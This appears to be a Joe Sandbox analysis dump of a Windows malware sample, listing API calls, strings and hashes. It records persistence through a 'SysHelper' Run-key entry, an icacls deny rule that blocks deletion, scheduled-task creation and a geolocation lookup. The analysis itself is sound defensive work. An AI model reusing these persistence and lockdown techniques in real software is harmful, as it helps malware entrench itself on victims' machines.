                                • API String ID: 2957410896-3144399390
                                • Opcode ID: 5654f1f0d8902897548b635c0c3de12d41863b9e7f9f148f59327b5af1546f90
                                • Instruction ID: ef0c4ad91a93ebed44a25fa424fadbe3f4bc75453965ff7ad5f6b92dd0de7051
                                • Opcode Fuzzy Hash: 5654f1f0d8902897548b635c0c3de12d41863b9e7f9f148f59327b5af1546f90
                                • Instruction Fuzzy Hash: 99D2F670604341ABD710EF21D895BDF77E5BF94308F00492EF48587291EB78AA99CB9B

                                Control-flow Graph (starting at 0040D240; legend: Executed / Not Executed)
                                APIs
                                • CoInitialize.OLE32(00000000), ref: 0040D26C
                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 0040D28F
                                • CoCreateInstance.OLE32(004D506C,00000000,00000001,004D4FEC,?,?,00000000,000000FF), ref: 0040D2D5
                                • VariantInit.OLEAUT32(?), ref: 0040D2F0
                                • VariantInit.OLEAUT32(?), ref: 0040D309
                                • VariantInit.OLEAUT32(?), ref: 0040D322
                                • VariantInit.OLEAUT32(?), ref: 0040D33B
                                • VariantClear.OLEAUT32(?), ref: 0040D397
                                • VariantClear.OLEAUT32(?), ref: 0040D3A4
                                • VariantClear.OLEAUT32(?), ref: 0040D3B1
                                • VariantClear.OLEAUT32(?), ref: 0040D3C2
                                • CoUninitialize.OLE32 ref: 0040D3D5
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Variant$ClearInit$Initialize$CreateInstanceSecurityUninitialize
                                • String ID: %Y-%m-%dT%H:%M:%S$--Task$2030-05-02T08:00:00$Author Name$PT5M$RegisterTaskDefinition. Err: %X$Time Trigger Task$Trigger1
                                • API String ID: 2496729271-1738591096
                                • Opcode ID: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
                                • Instruction ID: 4ad9c2e8017b41c765d67f99bb49247a0c13fc41f24acee5688789d455a97b09
                                • Opcode Fuzzy Hash: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
                                • Instruction Fuzzy Hash: 05526F70E00219DFDB10DFA8C858FAEBBB4EF49304F1481A9E505BB291DB74AD49CB95

                                Control-flow Graph (starting at 0040CF10; legend: Executed / Not Executed)
                                APIs
                                • _memset.LIBCMT ref: 0040CF4A
                                • InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
                                • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
                                • InternetReadFile.WININET(00000000,?,00002800,?), ref: 0040CFCD
                                • InternetCloseHandle.WININET(00000000), ref: 0040CFDA
                                • InternetCloseHandle.WININET(00000000), ref: 0040CFDD
                                Strings
                                • "country_code":", xrefs: 0040CFE1
                                • https://api.2ip.ua/geo.json, xrefs: 0040CF79
                                • Microsoft Internet Explorer, xrefs: 0040CF5A
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleOpen$FileRead_memset
                                • String ID: "country_code":"$Microsoft Internet Explorer$https://api.2ip.ua/geo.json
                                • API String ID: 1485416377-2962370585
                                • Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                • Instruction ID: 63dc5d72282b855868e1768d03255ed744c0e271f8772f8e66d922d9032ce3a5
                                • Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                • Instruction Fuzzy Hash: 0F91B470D00218EBDF10DF90DD55BEEBBB4AF05308F14416AE4057B2C1DBBA5A89CB59

                                Control-flow Graph (starting at 00411CD0; legend: Executed / Not Executed)
                                APIs
                                • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
                                • _memset.LIBCMT ref: 00411D3B
                                • RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
                                • lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
                                • PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48
                                • LoadLibraryW.KERNEL32(Shell32.dll,?,?), ref: 00411E99
                                • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00411EA5
                                • GetCommandLineW.KERNEL32 ref: 00411EB4
                                • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00411EBF
                                • lstrcpyW.KERNEL32(?,00000000), ref: 00411ECE
                                • PathFindFileNameW.SHLWAPI(?), ref: 00411EDB
                                • UuidCreate.RPCRT4(?), ref: 00411EFC
                                • UuidToStringW.RPCRT4(?,?), ref: 00411F14
                                • RpcStringFreeW.RPCRT4(00000000), ref: 00411F64
                                • PathAppendW.SHLWAPI(?,?), ref: 00411F83
                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00411F8E
                                • PathAppendW.SHLWAPI(?,?,?,?), ref: 0041202D
                                • DeleteFileW.KERNEL32(?), ref: 00412036
                                • CopyFileW.KERNEL32(?,?,00000000), ref: 0041204C
                                • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 0041206E
                                • _memset.LIBCMT ref: 00412090
                                • lstrcpyW.KERNEL32(?,005002FC), ref: 004120AA
                                • lstrcatW.KERNEL32(?,?), ref: 004120C0
                                • lstrcatW.KERNEL32(?," --AutoStart), ref: 004120CE
                                • lstrlenW.KERNEL32(?), ref: 004120D7
                                • RegSetValueExW.KERNEL32(00000000,SysHelper,00000000,00000002,?,00000000), ref: 004120F3
                                • RegCloseKey.ADVAPI32(00000000), ref: 004120FC
                                • _memset.LIBCMT ref: 00412120
                                • SetLastError.KERNEL32(00000000), ref: 00412146
                                • lstrcpyW.KERNEL32(?,icacls "), ref: 00412158
                                • lstrcatW.KERNEL32(?,?), ref: 0041216D
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: FilePath$_memsetlstrcatlstrcpy$AppendCloseCommandCreateLineOpenStringUuidValuelstrlen$AddressArgvCopyDeleteDirectoryErrorExistsFindFreeLastLibraryLoadNameProcQuery
                                • String ID: " --AutoStart$" --AutoStart$" /deny *S-1-1-0:(OI)(CI)(DE,DC)$D$SHGetFolderPathW$Shell32.dll$Software\Microsoft\Windows\CurrentVersion\Run$SysHelper$icacls "
                                • API String ID: 2589766509-1182136429

                                Control-flow Graph

                                APIs
                                • GetCommandLineW.KERNEL32 ref: 00412235
                                • CommandLineToArgvW.SHELL32(00000000,?), ref: 00412240
                                • PathFindFileNameW.SHLWAPI(00000000), ref: 00412248
                                • LoadLibraryW.KERNEL32(kernel32.dll), ref: 00412256
                                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041226A
                                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00412275
                                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00412280
                                • LoadLibraryW.KERNEL32(Psapi.dll), ref: 00412291
                                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041229F
                                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004122AA
                                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004122B5
                                • K32EnumProcesses.KERNEL32(?,0000A000,?), ref: 004122CD
                                • OpenProcess.KERNEL32(00000410,00000000,?), ref: 004122FE
                                • K32EnumProcessModules.KERNEL32(00000000,?,00000004,?), ref: 00412315
                                • K32GetModuleBaseNameW.KERNEL32(00000000,?,?,00000400), ref: 0041232C
                                • CloseHandle.KERNEL32(00000000), ref: 00412347
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$CommandEnumLibraryLineLoadNameProcess$ArgvBaseCloseFileFindHandleModuleModulesOpenPathProcesses
                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Psapi.dll$kernel32.dll
                                • API String ID: 3668891214-3807497772

                                Control-flow Graph

                                APIs
                                • _memset.LIBCMT ref: 004235B1
                                  • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                                • __gmtime64_s.LIBCMT ref: 0042364A
                                • __gmtime64_s.LIBCMT ref: 00423680
                                • __gmtime64_s.LIBCMT ref: 0042369D
                                • __allrem.LIBCMT ref: 004236F3
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042370F
                                • __allrem.LIBCMT ref: 00423726
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423744
                                • __allrem.LIBCMT ref: 0042375B
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423779
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit_memset
                                • String ID:
                                • API String ID: 1503770280-0

                                Control-flow Graph

                                APIs
                                • ___crtCorExitProcess.LIBCMT ref: 00427B11
                                  • Part of subcall function 00427AD7: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,i;B,00427B16,i;B,?,00428BCA,000000FF,0000001E,00507BD0,00000008,00428B0E,i;B,i;B), ref: 00427AE6
                                  • Part of subcall function 00427AD7: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 00427AF8
                                • ExitProcess.KERNEL32 ref: 00427B1A
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess$AddressHandleModuleProc___crt
                                • String ID: i;B
                                • API String ID: 2427264223-472376889

                                Control-flow Graph

                                APIs
                                • __lock.LIBCMT ref: 0042FB7B
                                  • Part of subcall function 00428AF7: __mtinitlocknum.LIBCMT ref: 00428B09
                                  • Part of subcall function 00428AF7: __amsg_exit.LIBCMT ref: 00428B15
                                  • Part of subcall function 00428AF7: EnterCriticalSection.KERNEL32(i;B,?,004250D7,0000000D), ref: 00428B22
                                • __tzset_nolock.LIBCMT ref: 0042FB8E
                                  • Part of subcall function 0042FE47: __lock.LIBCMT ref: 0042FE6C
                                  • Part of subcall function 0042FE47: ____lc_codepage_func.LIBCMT ref: 0042FEB3
                                  • Part of subcall function 0042FE47: __getenv_helper_nolock.LIBCMT ref: 0042FED4
                                  • Part of subcall function 0042FE47: _free.LIBCMT ref: 0042FF07
                                  • Part of subcall function 0042FE47: _strlen.LIBCMT ref: 0042FF0E
                                  • Part of subcall function 0042FE47: __malloc_crt.LIBCMT ref: 0042FF15
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: __lock$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__malloc_crt__mtinitlocknum__tzset_nolock_free_strlen
                                • String ID:
                                • API String ID: 1282695788-0

                                Control-flow Graph

                                APIs
                                • _doexit.LIBCMT ref: 00427F47
                                  • Part of subcall function 00427E0E: __lock.LIBCMT ref: 00427E1C
                                  • Part of subcall function 00427E0E: DecodePointer.KERNEL32(00507B08,0000001C,00427CFB,00423B69,00000001,00000000,i;B,00427C49,000000FF,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E5B
                                  • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E6C
                                  • Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E85
                                  • Part of subcall function 00427E0E: DecodePointer.KERNEL32(-00000004,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E95
                                  • Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E9B
                                  • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EB1
                                  • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EBC
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Pointer$Decode$Encode$__lock_doexit
                                • String ID:
                                • API String ID: 2158581194-0
                                APIs
                                • GetVersionExA.KERNEL32(00000094), ref: 00481983
                                • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00481994
                                • LoadLibraryA.KERNEL32(KERNEL32.DLL), ref: 004819A1
                                • LoadLibraryA.KERNEL32(NETAPI32.DLL), ref: 004819AE
                                • GetProcAddress.KERNEL32(00000000,NetStatisticsGet), ref: 004819E8
                                • GetProcAddress.KERNEL32(?,NetApiBufferFree), ref: 004819FB
                                • FreeLibrary.KERNEL32(?), ref: 00481AC5
                                • GetProcAddress.KERNEL32(?,CryptAcquireContextW), ref: 00481ADB
                                • GetProcAddress.KERNEL32(?,CryptGenRandom), ref: 00481AEE
                                • GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00481B01
                                • FreeLibrary.KERNEL32(?), ref: 00481C15
                                • LoadLibraryA.KERNEL32(USER32.DLL), ref: 00481C36
                                • GetProcAddress.KERNEL32(00000000,GetForegroundWindow), ref: 00481C50
                                • GetProcAddress.KERNEL32(?,GetCursorInfo), ref: 00481C63
                                • GetProcAddress.KERNEL32(?,GetQueueStatus), ref: 00481C76
                                • FreeLibrary.KERNEL32(?), ref: 00481D45
                                • GetProcAddress.KERNEL32(?,CreateToolhelp32Snapshot), ref: 00481D73
                                • GetProcAddress.KERNEL32(?,CloseToolhelp32Snapshot), ref: 00481D86
                                • GetProcAddress.KERNEL32(?,Heap32First), ref: 00481D99
                                • GetProcAddress.KERNEL32(?,Heap32Next), ref: 00481DAC
                                • GetProcAddress.KERNEL32(?,Heap32ListFirst), ref: 00481DBF
                                • GetProcAddress.KERNEL32(?,Heap32ListNext), ref: 00481DD2
                                • GetProcAddress.KERNEL32(?,Process32First), ref: 00481DE5
                                • GetProcAddress.KERNEL32(?,Process32Next), ref: 00481DF8
                                • GetProcAddress.KERNEL32(?,Thread32First), ref: 00481E0B
                                • GetProcAddress.KERNEL32(?,Thread32Next), ref: 00481E1E
                                • GetProcAddress.KERNEL32(?,Module32First), ref: 00481E31
                                • GetProcAddress.KERNEL32(?,Module32Next), ref: 00481E44
                                • GetTickCount.KERNEL32 ref: 00481F03
                                • GetTickCount.KERNEL32 ref: 00481FF1
                                • GetTickCount.KERNEL32 ref: 00482066
                                • GetTickCount.KERNEL32 ref: 00482095
                                • GetTickCount.KERNEL32 ref: 004820FB
                                • GetTickCount.KERNEL32 ref: 00482118
                                • GetTickCount.KERNEL32 ref: 00482187
                                • GetTickCount.KERNEL32 ref: 004821A4
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$CountTick$Library$Load$Free$Version
                                • String ID: $$ADVAPI32.DLL$CloseToolhelp32Snapshot$CreateToolhelp32Snapshot$CryptAcquireContextW$CryptGenRandom$CryptReleaseContext$GetCursorInfo$GetForegroundWindow$GetQueueStatus$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Intel Hardware Cryptographic Service Provider$KERNEL32.DLL$LanmanServer$LanmanWorkstation$Module32First$Module32Next$NETAPI32.DLL$NetApiBufferFree$NetStatisticsGet$Process32First$Process32Next$Thread32First$Thread32Next$USER32.DLL
                                • API String ID: 842291066-1723836103
                                APIs
                                • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00411010
                                • __CxxThrowException@8.LIBCMT ref: 00411026
                                  • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0041103B
                                • __CxxThrowException@8.LIBCMT ref: 00411051
                                • lstrlenA.KERNEL32(?,00000000), ref: 00411059
                                • CryptHashData.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00411064
                                • __CxxThrowException@8.LIBCMT ref: 0041107A
                                • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,00000000,?,00000000), ref: 00411099
                                • __CxxThrowException@8.LIBCMT ref: 004110AB
                                • _memset.LIBCMT ref: 004110CA
                                • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 004110DE
                                • __CxxThrowException@8.LIBCMT ref: 004110F0
                                • _malloc.LIBCMT ref: 00411100
                                • _memset.LIBCMT ref: 0041110B
                                • _sprintf.LIBCMT ref: 0041112E
                                • lstrcatA.KERNEL32(?,?), ref: 0041113C
                                • CryptDestroyHash.ADVAPI32(00000000), ref: 00411154
                                • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0041115F
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Crypt$Exception@8HashThrow$ContextParam_memset$AcquireCreateDataDestroyExceptionRaiseRelease_malloc_sprintflstrcatlstrlen
                                • String ID: %.2X
                                • API String ID: 2451520719-213608013
                                APIs
                                • GetLastError.KERNEL32 ref: 00411915
                                • FormatMessageW.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000), ref: 00411932
                                • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411941
                                • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411948
                                • LocalAlloc.KERNEL32(00000040,00000000,?,00000400,?,00000000,00000000), ref: 00411956
                                • lstrcpyW.KERNEL32(00000000,?), ref: 00411962
                                • lstrcatW.KERNEL32(00000000, failed with error ), ref: 00411974
                                • lstrcatW.KERNEL32(00000000,?), ref: 0041198B
                                • lstrcatW.KERNEL32(00000000,00500260), ref: 00411993
                                • lstrcatW.KERNEL32(00000000,?), ref: 00411999
                                • lstrlenW.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 004119A3
                                • _memset.LIBCMT ref: 004119B8
                                • lstrcpynW.KERNEL32(?,00000000,00000400,?,00000400,?,00000000,00000000), ref: 004119DC
                                  • Part of subcall function 00412BA0: lstrlenW.KERNEL32(?), ref: 00412BC9
                                • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411A01
                                • LocalFree.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 00411A04
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcatlstrlen$Local$Free$AllocErrorFormatLastMessage_memsetlstrcpylstrcpyn
                                • String ID: failed with error
                                • API String ID: 4182478520-946485432
                                APIs
                                  • Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411ACA
                                  • Part of subcall function 00411AB0: DispatchMessageW.USER32(?), ref: 00411AE0
                                  • Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411AEE
                                • PathFindFileNameW.SHLWAPI(?,?,00000000,000000FF), ref: 0040F900
                                • _memmove.LIBCMT ref: 0040F9EA
                                • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0040FA51
                                • _memmove.LIBCMT ref: 0040FADA
                                Similarity
                                • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
                                • String ID:
                                APIs
                                • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000,00000000), ref: 0040E8CE
                                • __CxxThrowException@8.LIBCMT ref: 0040E8E4
                                  • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040E8F9
                                • __CxxThrowException@8.LIBCMT ref: 0040E90F
                                • CryptHashData.ADVAPI32(00000000,00000000,?,00000000), ref: 0040E928
                                • __CxxThrowException@8.LIBCMT ref: 0040E93E
                                • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 0040E95D
                                • __CxxThrowException@8.LIBCMT ref: 0040E96F
                                • _memset.LIBCMT ref: 0040E98E
                                • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040E9A2
                                • __CxxThrowException@8.LIBCMT ref: 0040E9B4
                                • _sprintf.LIBCMT ref: 0040E9D3
                                Strings
                                Similarity
                                • API ID: CryptException@8Throw$Hash$Param$AcquireContextCreateDataExceptionRaise_memset_sprintf
                                • String ID: %.2X
                                APIs
                                • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000), ref: 0040EB01
                                • __CxxThrowException@8.LIBCMT ref: 0040EB17
                                  • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040EB2C
                                • __CxxThrowException@8.LIBCMT ref: 0040EB42
                                • CryptHashData.ADVAPI32(00000000,?,?,00000000), ref: 0040EB4E
                                • __CxxThrowException@8.LIBCMT ref: 0040EB64
                                • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,?,00000000), ref: 0040EB83
                                • __CxxThrowException@8.LIBCMT ref: 0040EB95
                                • _memset.LIBCMT ref: 0040EBB4
                                • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040EBC8
                                • __CxxThrowException@8.LIBCMT ref: 0040EBDA
                                • _sprintf.LIBCMT ref: 0040EBF4
                                • CryptDestroyHash.ADVAPI32(00000000), ref: 0040EC44
                                • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0040EC4F
                                Strings
                                Similarity
                                • API ID: Crypt$Exception@8HashThrow$ContextParam$AcquireCreateDataDestroyExceptionRaiseRelease_memset_sprintf
                                • String ID: %.2X
                                APIs
                                  • Part of subcall function 004549A0: GetModuleHandleA.KERNEL32(?,?,00000001,?,00454B72), ref: 004549C7
                                  • Part of subcall function 004549A0: GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
                                  • Part of subcall function 004549A0: GetDesktopWindow.USER32 ref: 004549FB
                                  • Part of subcall function 004549A0: GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
                                  • Part of subcall function 004549A0: GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
                                  • Part of subcall function 004549A0: GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
                                  • Part of subcall function 004549A0: GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
                                  • Part of subcall function 004549A0: _wcsstr.LIBCMT ref: 00454A8A
                                • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00482316
                                • CreateCompatibleDC.GDI32(00000000), ref: 00482323
                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 00482338
                                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00482341
                                • CreateCompatibleBitmap.GDI32(00000000,?,00000010), ref: 0048234E
                                • SelectObject.GDI32(00000000,00000000), ref: 0048235C
                                • GetObjectA.GDI32(00000000,00000018,?), ref: 0048236E
                                • BitBlt.GDI32(?,00000000,00000000,?,00000010,?,00000000,00000000,00CC0020), ref: 004823CA
                                • GetBitmapBits.GDI32(?,?,00000000), ref: 004823D6
                                • SelectObject.GDI32(?,?), ref: 00482436
                                • DeleteObject.GDI32(00000000), ref: 0048243D
                                • DeleteDC.GDI32(?), ref: 0048244A
                                • DeleteDC.GDI32(?), ref: 00482450
                                Strings
                                Similarity
                                • API ID: Object$CreateDelete$BitmapCapsCompatibleDeviceInformationSelectUserWindow$AddressBitsDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                • String ID: .\crypto\rand\rand_win.c$DISPLAY
                                APIs
                                • _malloc.LIBCMT ref: 0040E67F
                                  • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                  • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                  • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00670000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                • _malloc.LIBCMT ref: 0040E68B
                                • _wprintf.LIBCMT ref: 0040E69E
                                • _free.LIBCMT ref: 0040E6A4
                                  • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
                                  • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                                • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6B9
                                • _free.LIBCMT ref: 0040E6C5
